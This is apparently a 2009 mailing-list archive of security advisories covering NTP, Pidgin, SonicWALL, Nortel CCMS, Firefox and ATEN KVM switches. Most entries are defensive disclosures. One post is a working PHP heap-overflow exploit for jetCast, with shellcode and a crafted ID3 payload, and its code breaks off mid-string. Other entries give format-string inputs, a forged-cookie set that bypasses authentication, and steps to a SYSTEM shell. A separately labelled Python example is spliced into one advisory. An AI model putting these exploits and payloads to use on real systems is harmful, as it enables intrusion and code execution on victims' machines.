[ GLSA 200905-08 ] NTP: Remote execution of arbitrary code

2009-05-26 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200905-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: NTP: Remote execution of arbitrary code
      Date: May 26, 2009
      Bugs: #263033, #268962
        ID: 200905-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple errors in the NTP client and server programs might allow for
the remote execution of arbitrary code.

Background
==========

NTP contains the client and daemon implementations for the Network Time
Protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/ntp              < 4.2.4_p7                   >= 4.2.4_p7

Description
===========

Multiple vulnerabilities have been found in the programs included in
the NTP package:

* Apple Product Security reported a boundary error in the
  cookedprint() function in ntpq/ntpq.c, possibly leading to a
  stack-based buffer overflow (CVE-2009-0159).

* Chris Ries of CMU reported a boundary error within the
  crypto_recv() function in ntpd/ntp_crypto.c, possibly leading to a
  stack-based buffer overflow (CVE-2009-1252).

Impact
======

A remote attacker might send a specially crafted package to a machine
running ntpd, possibly resulting in the remote execution of arbitrary
code with the privileges of the user running the daemon, or a Denial of
Service. NOTE: Successful exploitation requires the "autokey" feature
to be enabled. This feature is only available if NTP was built with the
'ssl' USE flag.

Furthermore, a remote attacker could entice a user into connecting to a
malicious server using ntpq, possibly resulting in the remote execution
of arbitrary code with the privileges of the user running the
application, or a Denial of Service.

Workaround
==========

You can protect against CVE-2009-1252 by disabling the 'ssl' USE flag
and recompiling NTP.

Resolution
==========

All NTP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.4_p7"

References
==========

  [ 1 ] CVE-2009-0159
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159
  [ 2 ] CVE-2009-1252
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200905-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




SEC Consult SA-20090525-4 :: SonicOS Format String Vulnerability

2009-05-26 Thread Bernhard Mueller
SEC Consult Security Advisory < 20090525-4 >
=======================================================================
                 title: SonicOS Format String Vulnerability
               program: SonicWALL Global VPN Client
    vulnerable version: PRO 4100 SonicOS 4.0.0.2-51e Standard and Enhanced
                        possibly other versions
              homepage: http://www.sonicwall.com
                 found: October 2006
                    by: lofi42
        permanent link: https://www.sec-consult.com/advisories_e.html#a54
=======================================================================

Product description:
--------------------

SonicOS Enhanced (SonicOSe) is the latest version of SonicWALL's
powerful SonicOS operating system, designed for the next generation of
SonicWALL firewall/VPN appliances.


Vulnerability overview:
-----------------------

A format string vulnerability exists in the logfile parsing function of
SonicOS. An attacker could crash the system or execute arbitrary code by
injecting format string metacharacters into the logfile, if an
administrator subsequently uses the SonicOS GUI to view the log.


Proof of concept:
-----------------

There are multiple ways to inject format string characters into the
logs. The following methods can be used to test for the vulnerability:

1. CFS: Add ebay.com to your "Forbidden Domains" and access
http://www.ebay.com/%s%s%s%s%s%s/. 

2. GroupVPN: Establish a GroupVPN tunnel and enter %s%s%s%s%s as the XAUTH
username.

3. Webfrontend: Enter %s%s%s%s%s as the username at the login page of your
SonicWALL.


SEC Consult will not release code execution exploits for this
vulnerability to the public.



Vendor contact timeline:
------------------------

2006:   Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release


Patch:
------

SEC Consult was not able to get any vendor feedback on this issue. We
are currently not aware of a patch or workaround.


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009



SEC Consult SA-20090525-3 :: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability

2009-05-26 Thread Bernhard Mueller
SEC Consult Security Advisory < 20090525-3 >
=======================================================================
                 title: SonicWALL Global VPN Client Local Privilege
                        Escalation Vulnerability
               program: SonicWALL Global VPN Client
    vulnerable version: Global VPN Client <= 4.0.0.835
                        possibly other versions
              homepage: http://www.sonicwall.com
                 found: October 2006
                    by: lofi42
        permanent link: https://www.sec-consult.com/advisories_e.html#a55
=======================================================================

Vendor description:
-------------------

The SonicWALL Global VPN Client offers an easy-to-use, easy-to-manage
Virtual Private Network (VPN) solution that provides users at
distributed locations with secure, reliable remote access via broadband,
wireless and dial-up connections.

[source: http://www.sonicwall.com/downloads/Global_VPN_DS_US.pdf]


Vulnerability overview:
-----------------------

A local privilege escalation vulnerability exists in SonicWALL Global
VPN client. By exploiting this vulnerability, a local attacker could
execute code with LocalSystem privileges.


Vulnerability description:
--------------------------

During installation of the SonicWALL Global VPN Client, the permissions
for the installation folder "%ProgramFiles%\SonicWALL\SonicWALL Global VPN
Client" are by default set to Everyone:Full Control without any warning.

The service "RampartSvc" is started from this folder. Services are
started under the LocalSystem account. There is no protection of the
service files. It is possible for unprivileged users to replace the
service executable with a file of their choice to get full access with
LocalSystem privileges.


Proof of concept:
-----------------

This vulnerability can be exploited without any special exploit code.


Vendor contact timeline:
------------------------

2006:   Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release


Patch:
------

SEC Consult was not able to get any vendor feedback on this issue. We
are currently not aware of a patch or workaround.


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009



SEC Consult SA-20090525-2 :: SonicWALL Global Security Client Local Privilege Escalation Vulnerability

2009-05-26 Thread Bernhard Mueller
SEC Consult Security Advisory < 20090525-2 >
=======================================================================
                 title: SonicWALL Global Security Client Local Privilege
                        Escalation Vulnerability
               program: SonicWALL Global Security Client
    vulnerable version: 1.0.0.15 and possibly other versions
              homepage: http://www.sonicwall.com
                 found: October 2006
                    by: lofi42
        permanent link: https://www.sec-consult.com/advisories_e.html#a56
=======================================================================

Vendor description:
-------------------

The SonicWALL Global Security Client offers IT professionals the
capability to manage a mobile user’s online access, based upon corporate
policies, in order to ensure optimal security of the network and
maximize network resources. Instant messaging, high-risk Web sites and
network file access can all be allowed or disallowed as security and
productivity concerns dictate. 

[source:
http://www.sonicwall.com/downloads/DS_GlobalSecurityClient_A4.pdf]


Vulnerability overview:
-----------------------

Local exploitation of a design error in SonicWALL's Global Security
Client could allow attackers to obtain increased privileges.


Vulnerability description:
--------------------------

The problem specifically exists because SYSTEM privileges are not
dropped when accessing the GSC properties from the System Tray applet.
The vulnerability can be exploited by right-clicking the System Tray
icon, choosing "Log", right-clicking "Event Viewer" and selecting "Open
Log File...". The file dialog that opens can be abused by navigating to
C:\WINDOWS\SYSTEM32\, right-clicking cmd.exe and selecting "Open"; doing
so spawns a command shell with SYSTEM privileges.


Proof of concept:
-----------------

This vulnerability can be exploited without any special exploit code.


Vendor contact timeline:
------------------------

2006:   Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release


Patch:
------

SEC Consult was not able to get any vendor feedback on this issue. We
are currently not aware of a patch or workaround.


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF SEC Consult Vulnerability Lab / @2009



SEC Consult SA-20090525-1 :: Nortel Contact Center Manager Server Password Disclosure Vulnerability

2009-05-26 Thread Bernhard Mueller
SEC Consult Security Advisory < 20090525-1 >
=======================================================================
                 title: Nortel Contact Center Manager Server Password
                        Disclosure
               program: Nortel Contact Center Manager Server
    vulnerable version: 6.0
              homepage: http://www.nortel.com/ccms
                 found: 2008-11-14
                    by: David Matscheko / SEC Consult Vulnerability Lab
        permanent link: https://www.sec-consult.com/advisories_e.html#a57
=======================================================================

Vendor description:
-------------------

Contact Center Manager Server (CCMS) offers a scalable solution for
dynamic contact center environments requiring sophistication and
differentiation in the care offered to their customers. CCMS provides
skill-based routing; call treatment flexibility, real time displays,
multimedia routing, and comprehensive management and reporting
functionality - empowering contact center managers with the tools and
agility to deliver unique and unprecedented care to their customers. The
rich scripting language supports multifaceted call routing and treatment
decisions based on combinations of real time conditions. 

[source: http://www.nortel.com/ccms]


Vulnerability overview:
-----------------------

The Nortel Contact Center Manager Server web application provides a SOAP
interface. This interface does not need authorisation and responds to
certain requests with sensitive information.


Vulnerability description:
--------------------------

The following SOAP request queries the user data for the user
"sysadmin":

-----------------------------------------------------------------------
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661


http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

http://SoapWrapperCommon.CCMA.Applications.Nortel.com">
  string
  string
  string
  string
  string
  string


-----------------------------------------------------------------------

The following is an excerpt of the response to the previous query. It
contains the user sysadmin with the corresponding password (the password,
server IP address and server name have been changed):

---



---


Proof of concept:
-----------------

This vulnerability can be exploited with a web browser and plugins / web
proxy.


Vulnerable versions:
--------------------

The version tested was 06.00.004.03 with the following updates applied:

CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502

Prior versions are most likely also vulnerable.


Vendor contact timeline:
------------------------

January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release


Patch:
------

The vendor has released a vulnerability fix which addresses the issue.
In addition, the vendor has released a public security advisory
containing update instructions. URL:

http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905808


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF David Matscheko / @2009



COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overflow exploit

2009-05-26 Thread nospam
http://retrogod.altervista.org/

software site: http://www.jetaudio.com/

Tested against JetAudio pack v.7.5.2


-----------------------------------------------------------------------

Passing an overlong string as id3 tag we have:

(370.7a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000394 ecx=41414141 edx=00160608 esi=010c1a00 edi=0302fbc8
eip=00486db7 esp=0302fb14 ebp=0302fe7c iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
jetCast+0x86db7:
00486db7 8b11            mov     edx,dword ptr [ecx]  ds:0023:41414141=????????

code:

00486DB7  |. 8B11           MOV EDX,DWORD PTR DS:[ECX] <---crash
00486DB9  |. 8B8D ACFCFFFF  MOV ECX,DWORD PTR SS:[EBP-354]
00486DBF  |. FF52 0C        CALL DWORD PTR DS:[EDX+C]
...

-----------------------------------------------------------------------

We have 4 bytes of ecx to redirect the program to edi, which keeps our buffer.
To do that first we set ecx to a portion of memory which *always* (or nearly)
keeps the filename. Look 0x0105... no null char allowed, so I will use
0x01050101 to hit the right offset.

To build it we need an address which points to a known call edi, compatible
with windows filenames. To achieve that you may do so:

x...@pyro ~/framework-2.2/tools
$ memdump (pid) jetcast

x...@pyro ~/framework-2.2/tools
$ cd ..

x...@pyro ~/framework-2.2/
$ msfpescan -d ./tools/jetcast/ -j edi
0x7d03388b call edi
...

x...@pyro ~/framework-2.2/tools
$ msfpescan -d ./tools/jetcast/ -x "\x8b\x38\x03\x7d"
0x028997c4   8b38037d
0x77e062f5   8b38037d
...

then subtract c. Repeat this for each call edi, took me some time to find every
combination by a script and I finally found a good one in the MSVCRT.DLL given
with the program; a third match seems not possible.

Note: first bytes of EDI keep some null chars, but as you can see, this
portion is nop-equivalent:

0348FBC8   0000 ADD BYTE PTR DS:[EAX],AL
0348FBCA   0000 ADD BYTE PTR DS:[EAX],AL
0348FBCC   0000 ADD BYTE PTR DS:[EAX],AL
0348FBCE   0000 ADD BYTE PTR DS:[EAX],AL
0348FBD0   90   NOP
0348FBD1   90   NOP
0348FBD2   90   NOP
...

Usage: php 9sg_jetcast_poc.php

It creates 4 files on your desktop, it says which will hit the right offset on
your system (file path is important to achieve arbitrary code execution on a
victim user so an attacker should persuade him to try to stream them ...)
It works by dragging the file on it or by right clicking and selecting
"Add files ...", not 100% reliable, version specific...

-----------------------------------------------------------------------

*/

 

error_reporting(0);
if (php_sapi_name() <> "cli")
{
die("[!] Launch from the cli!");
}

$scode = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53".
"\xbb\x0d\x25\x86\x7c". //WinExec, 0x7c86250d
"\xff\xd3\x31\xc0\x50". "\xbb\x12\xcb\x81\x7c". //ExitProcess, 0x7c81cb12
"\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65".
"\x78\x65\x20\x2f\x63\x20". "cmd /c calc && ". "\xff";

if (strlen($scode) > 118)
{
die("[!] Shellcode too large here!");
}

$BOOM =
"\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00".
 str_repeat("\x90", 0x7c).//nop, very reusable
"\xeb\x06\x90\x90". //jmp short
//"\x01\x01\x06\x01". //less usually in this location...
"\x01\x01\x05\x01". //eax - ecx, this works 80% of the times
"\x90\x90\x90\x90". //nop
$scode. str_repeat("A", 0x01f0 - strlen($scode)).
"\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f".
"\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x6e\x66\x6f\x00\x00\x00".
"\x0f\x00\x00\x04\x7e\x00\x07\x57\x2e\x00\x02\x05\x08\x0a\x0d\x10\x12\x14\x17\x19\x1c\x1f\x21\x24\x27\x28\x2b\x2e\x30\x

SEC Consult SA-20090525-0 :: Nortel Contact Center Manager Server Authentication Bypass Vulnerability

2009-05-26 Thread Bernhard Mueller
SEC Consult Security Advisory < 20090525-0 >
=======================================================================
                 title: Nortel Contact Center Manager Server Authentication
                        Bypass
               program: Nortel Contact Center Manager Server
    vulnerable version: 6.0
              homepage: http://www.nortel.com/ccms
                 found: 2008-11-14
                    by: Bernhard Mueller / SEC Consult Vulnerability Lab
        permanent link: https://www.sec-consult.com/advisories_e.html#a58
=======================================================================

Vendor description:
-------------------

Contact Center Manager Server (CCMS) offers a scalable solution for
dynamic contact center environments requiring sophistication and
differentiation in the care offered to their customers. CCMS provides
skill-based routing; call treatment flexibility, real time displays,
multimedia routing, and comprehensive management and reporting
functionality - empowering contact center managers with the tools and
agility to deliver unique and unprecedented care to their customers. The
rich scripting language supports multifaceted call routing and treatment
decisions based on combinations of real time conditions. 

[source: http://www.nortel.com/ccms]


Vulnerability overview:
-----------------------

The Nortel Contact Center Manager Server web application relies on
client side cookies to check the roles of authenticated users.
Authentication can be bypassed by manually setting the required cookies.
By exploiting this vulnerability, an attacker can bypass authentication
and access the Nortel Contact Center Manager Server.


Vulnerability description:
--------------------------

The following cookies have to be set to access all menu items:

LoginMsgSwitch=True
LoginMsgAccepted=True
Logged=True
isAdmin=True
LoginMsgSwitch=True
LoginMsgAccepted=True
IsConfig=1
IsUser=1
IsRTD=1
IsReport=1
IsScript=1
IsAudit=1
IsEmHelp=1
isOutbound=1
UserID=x
AuditSwitch=on
LoginMsgAccepted=True


Proof of concept:
-----------------

This vulnerability can be exploited with a web browser and plugins / web
proxy.


Vulnerable versions:
--------------------

The version tested was 06.00.004.03 with the following updates applied:

CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502

Prior versions are most likely also vulnerable.


Vendor contact timeline:
------------------------

January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release


Patch:
------

The vendor has released a vulnerability fix which addresses the issue.
In addition, the vendor has released a public security advisory
containing update instructions. URL:

http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905698


--

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008
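
An added example, not part of the advisory and not Nortel's code, that puts the cookie-trusting role check described above next to a server-side session lookup. The cookie names are the ones the post lists; the user table, passwords and the SESSIONID cookie are constructed assumptions.

```python
import hmac
import secrets
from http.cookies import SimpleCookie
from typing import Dict, Optional, Set

# Role flags the advisory lists as plain client-side cookies.
ROLE_FLAGS = ("isAdmin", "IsConfig", "IsUser", "IsRTD", "IsReport",
              "IsScript", "IsAudit", "IsEmHelp", "isOutbound")

# Constructed Cookie header: every value from the advisory, but no login ever happened.
FORGED_COOKIE_HEADER = (
    "LoginMsgSwitch=True; LoginMsgAccepted=True; Logged=True; isAdmin=True; "
    "IsConfig=1; IsUser=1; IsRTD=1; IsReport=1; IsScript=1; IsAudit=1; "
    "IsEmHelp=1; isOutbound=1; UserID=x; AuditSwitch=on"
)


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Turn a request Cookie header into a name -> value mapping."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def vulnerable_roles(cookie_header: str) -> Set[str]:
    """The pattern the advisory describes: login state and roles are read
    straight from cookies, so whoever sets the cookies decides what they may do."""
    cookies = parse_cookie_header(cookie_header)
    if cookies.get("Logged") != "True":
        return set()
    return {flag for flag in ROLE_FLAGS if cookies.get(flag) in ("1", "True")}


# --- hardened variant: the client holds only an opaque session id ------------

# Constructed, hypothetical user table; roles live on the server, never in a
# cookie (a real store would hold password hashes, not plaintext).
USERS = {
    "sysadmin": {"password": "correct horse", "roles": {"isAdmin", "IsConfig", "IsUser"}},
    "agent":    {"password": "battery staple", "roles": {"IsUser", "IsRTD"}},
}
SESSIONS: Dict[str, str] = {}   # session id -> username; stand-in for a server-side store


def login(username: str, password: str) -> Optional[str]:
    """Return a fresh, unguessable session id on success, None otherwise."""
    user = USERS.get(username)
    if user is None or not hmac.compare_digest(user["password"], password):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid


def hardened_roles(cookie_header: str) -> Set[str]:
    """Roles come from the server-side record bound to the session id; any
    isAdmin/Is* cookie the client sends is never consulted."""
    sid = parse_cookie_header(cookie_header).get("SESSIONID")
    username = SESSIONS.get(sid) if sid else None
    if username is None:
        return set()
    return set(USERS[username]["roles"])
```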



[ GLSA 200905-07 ] Pidgin: Multiple vulnerabilities

2009-05-26 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200905-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Pidgin: Multiple vulnerabilities
      Date: May 25, 2009
      Bugs: #270811
        ID: 200905-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Pidgin might allow for the remote execution
of arbitrary code or a Denial of Service.

Background
==========

Pidgin (formerly Gaim) is an instant messaging client for a variety of
instant messaging protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-im/pidgin               < 2.5.6                        >= 2.5.6

Description
===========

Multiple vulnerabilities have been discovered in Pidgin:

* Veracode reported a boundary error in the "XMPP SOCKS5 bytestream
  server" when initiating an outgoing file transfer (CVE-2009-1373).

* Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol
  handler (CVE-2009-1374).

* A memory corruption flaw in "PurpleCircBuffer" was disclosed by
  Josef Andrysek (CVE-2009-1375).

* The previous fix for CVE-2008-2927 contains a cast from uint64 to
  size_t, possibly leading to an integer overflow (CVE-2009-1376, GLSA
  200901-13).

Impact
======

A remote attacker could send specially crafted messages or files using
the MSN, XMPP or QQ protocols, possibly resulting in the execution of
arbitrary code with the privileges of the user running the application,
or a Denial of Service. NOTE: Successful exploitation might require the
victim's interaction.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Pidgin users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-im/pidgin-2.5.6"

References
==========

  [ 1 ] CVE-2009-1373
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373
  [ 2 ] CVE-2009-1374
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374
  [ 3 ] CVE-2009-1375
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375
  [ 4 ] CVE-2009-1376
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376
  [ 5 ] GLSA 200901-13
http://www.gentoo.org/security/en/glsa/glsa-200901-13.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200905-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




[TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)

2009-05-26 Thread Thierry Zoller


   From the low-hanging-fruit-department 
 Firefox et al. Denial of Service - All versions supporting SVG


CHEAP Plug :

You are invited to participate in HACK.LU 2009, a small but concentrated
Luxembourgish security conference. More information : http://www.hack.lu
CFP is open, sponsorship is still possible and warmly welcomed!


Release mode: Forced release.
Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG
WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html
Vendor  : http://www.firefox.com
Status  : No patch
CVE : none provided
Credit  : none 
Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615

Security notification reaction rating : There wasn't any reaction. OSS Security 
notification FTW
Notification to patch window : x+n

Disclosure Policy : 
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products : 
- Firefox all supporting SVG (didn't care to investigate which, task of the 
vendor)
- all software packages using mozilla engine and allowing SVG

I. Background
~~~~~~~~~~~~~
Firefox is a popular internet browser.

II. Description
~~~~~~~~~~~~~~~
This bug is a typical result of what we call an unclamped loop. An "attacker"
will give the Radius value of the Circle attribute a very big value. That
is leetness.

Stack trace : 
ntkrnlpa.exe+0x6e9ab
ntkrnlpa.exe!MmIsDriverVerifying+0xbb0
hal.dll+0x2ef2
xul.dll!NS_InvokeByIndex_P+0x30c36
xul.dll!NS_InvokeByIndex_P+0x30e8a
xul.dll!NS_InvokeByIndex_P+0x30e02
xul.dll!NS_InvokeByIndex_P+0x30f5e
xul.dll!XRE_InitEmbedding+0x7858
xul.dll!XRE_InitEmbedding+0xf4ee
xul.dll!XRE_TermEmbedding+0x11411
xul.dll!gfxTextRun::Draw+0xdd4d
xul.dll!gfxTextRun::Draw+0xe1ca
xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495
xul.dll!gfxTextRun::SetSpaceGlyph+0x2678
xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3
xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6
xul.dll!NS_StringCopy_P+0x9942
xul.dll!gfxImageSurface::gfxImageSurface+0x3188
xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8


Also produces exceptions in MOZCRT19...
MOZCRT19!modf+0x2570:
600715e0 660f122550450960 movlpd  xmm4,qword ptr 
[MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] 
ds:0023:60094550=3fe62e42fefa39ef

III. Impact
~~~~~~~~~~~
Browser doesn't respond any longer to any user input, all tabs are no 
longer accessible, your work if any  (hail to the web 2.0) might be lost.

IV. Proof of concept (hold your breath)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







IV. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~
DD/MM/YYYY
18/11/2008 : Created bugzilla entry (security) with proof of concept,
             description, the terms under which I cooperate and the planned
             disclosure date.

24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG
             (seems to be looping in libthebes), but I can definitely confirm
             the DoS."
  
14/12/2008 : Ask for any action plan and my assessment of considering it low
             risk

 No reply.

28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug
             to the public [..] a bug like this is more likely to be fixed
             by being visible to more people than by leaving it in
             a closet.
 
26/05/2009 : In 2009 I agree; release of this advisory. 







Multiple vulnerabilities in several ATEN IP KVM Switches

2009-05-26 Thread Jakob Lell

Jakob Lell from the TU Berlin computer security working group (
http://www.agrs.tu-berlin.de/v-menue/ag_rechnersicherheit/parameter/en/
) has discovered multiple vulnerabilities in several ATEN IP KVM
Switches.


Affected products:
- ATEN KH1516i IP KVM Switch (browser firmware version 1.0.063)
- ATEN KN9116  IP KVM Switch (firmware version 1.1.104)
- Aten PN9108  Power over the NET (only CVE-2009-1477)

The KH1508i uses the same firmware as the KH1516i and is thus most
likely affected as well. The KN9108 uses the same firmware as the
KN9116. It is possible that other devices are affected as well. If you
have access to other similar devices and want to test whether they are
vulnerable as well, please contact me at ja...@cs.tu-berlin.de.


Impact: Arbitrary code execution on client system, Information
disclosure and man in the middle attacks.

Background:
Aten produces several IP KVM Switches. These devices can be used like a
normal kvm switch with an attached keyboard, mouse and monitor.
However, it is also possible to access the hosts connected to the kvm
switch via a network using an ordinary PC as a client. As this can
also be used via an insecure network, it is very important that this
connection is cryptographically protected against sniffing of
confidential data (e.g.  keystrokes, monitor signals) and man in the
middle attacks. The affected products provide an SSL encrypted web
interface. After authenticating to the web interface the user can
download a client program (java or windows). The client program
contains temporary authentication data so that it can connect to the
kvm switch without asking the user for username/password again.

CVE-2009-1477: Same SSL Key for all devices
All tested devices (KH1516i, KN9116 and PN9108) use the same SSL key
for the https web interface. If an attacker manages to extract the
private key from one single device, (s)he can decrypt the https
traffic of all other affected devices. This includes the username and
password used to authenticate to the kvm switch. If the attacker is
able to carry out a man in the middle attack, (s)he can also
compromise client systems by exchanging the windows or java client
software which is downloaded from the kvm switch via https.
Severity: High

CVE-2009-1472: Java client arbitrary code execution
The java client program connects to the kvm switch on port 9002 and
downloads and runs a new java class. This connection is encrypted
using AES. However, the encryption key is hardcoded in the client
program. So a man in the middle attacker can inject another java
class file which can execute arbitrary java code on the client
computer. This java code is not protected by a sandbox as the client
isn't run as a java applet.  It is also possible to use this
vulnerability to do a man in the middle attack to gain access to the
machines connected to the kvm switch.
Severity: High

CVE-2009-1473: Cryptographic weakness in key exchange
When the windows/java client connects to the device, the kvm switch
and the client negotiate a symmetric session key. This key negotiation
uses RSA in an insecure way. An attacker who can monitor the traffic
between the client and the kvm switch is able to repeat client-side
calculations to get the session key. By using this session key an
attacker can decrypt the traffic and reconstruct the keystrokes.
Furthermore it is also possible to carry out a man in the middle
attack and gain access to the machines connected to the KVM switch.
Both the Windows and the Java clients are affected.
Severity: High

CVE-2009-1474: Incomplete encryption
The connection between the client and the kvm switch is not completely
encrypted. The transfer of keystrokes is encrypted. However, mouse
events are not protected in any way. So a man in the middle attacker
can inject arbitrary mouse movements and press mouse buttons.
Depending on the operating system and setup this may be used to
compromise computers attached to the kvm switch.
Severity: Medium

CVE-2009-1474: Session ID Cookie not secure-only
When the user connects to the device via http on port 80, the device
redirects the user to the same device on port 443 (https). There the
user logs in and gets a session id cookie. However, this cookie does
not contain the secure option as specified in rfc2109. When the user
goes back to http for any reason, an attacker can sniff the session
id. Using this session ID it is possible to download the Windows/Java
client program (which contains authentication data) and then access
the computers connected to the KVM Switch. As the first connection via
